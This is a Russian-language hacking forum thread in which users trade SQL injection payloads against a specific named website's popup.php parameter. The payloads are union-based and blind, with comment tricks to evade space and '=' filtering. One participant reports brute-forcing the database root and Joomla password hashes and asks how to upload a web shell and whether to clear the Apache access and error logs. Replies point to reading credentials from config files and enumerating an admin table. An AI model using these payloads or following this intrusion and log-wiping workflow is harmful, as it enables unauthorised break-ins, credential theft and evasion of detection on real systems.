Разницы никакой,пробовал...

Реальный пример можно? Хотя тут и по ошибке всё понятно...

http://apsite.ru/x/popup.php?mod=1'
P.S. а чё тут понятно? =)

p.r0phe.t
Я не понимаю, неужели нельзя сначала хоть что-то прочитать?
Что ты хочешь что-бы тебе тут ответили без линка и с такой информацией?

А вот так что выдаёт?
.php?mod=-1'/**/union/**/select/**/1/*
А вот так?
.php?mod=-1/**/union/**/select/**/1/*
А вот так?
.php?mod=1/**/union/**/select/**/1/*
А вот так?
.php?mod=1/**/union/**/select/**/1--+
А вот так?
.php?mod=-1/**/union/**/select/**/1--+
А вот так?
.php?mod=-1/**/and/**/1=1--+
А вот так?
.php?mod=-1/**/and/**/1=2--+

Продолжаем гадание, или почитаешь что-то? А может мы увидем линк?

^
^
^
^

А разве я не могу взять другую html`ку на саете, переправить под форму создания юзера и вызову функцию?

как себя обезопасить после проведения Sql inj.
известно:
система: Apache/2.2.6 (FreeBSD) mod_ssl/2.2.6 OpenSSL/0.9.8e DAV/2 PHP/5.2.9 with Suhosin-Patch
version(): 5.1.22-rc-log
есть login и хеш пароль roota к БД бручу... пока безуспешно.
там висит JOOMLA пасс тоже пока в бруте.
как залить шелл после того как я узнаю пасс?
логи чистить эти?
/var/log/httpd-error.log
/var/log/httpd-access.log
какие дальше действия?

Скуль от какого юзера бд? МОжет через неё легче прочитать пасс root'а где-нить в конфигах чем брутить.

p.r0phe.t

4 ветка, фильтрация пробелов, "+", "=".
file_priv=n

Если очень-очень нужно, то можно:
http://apsite.ru/x/popup.php?mod=1'/**/or/**/if(substring(version(),1,1)/**/like/**/4,1,(select/**/1/**/union/**/select/**/2))/*

подбираем таблицу:
http://apsite.ru/x/popup.php?mod=1'/**/or/**/if((select/**/1/**/from/**/admin),1,(select/**/1/**/union/**/select/**/2))/*

и дальше в этом-же ключе :
http://forum.antichat.ru/threadnav35207-1-10.html

Отличный способ от скуки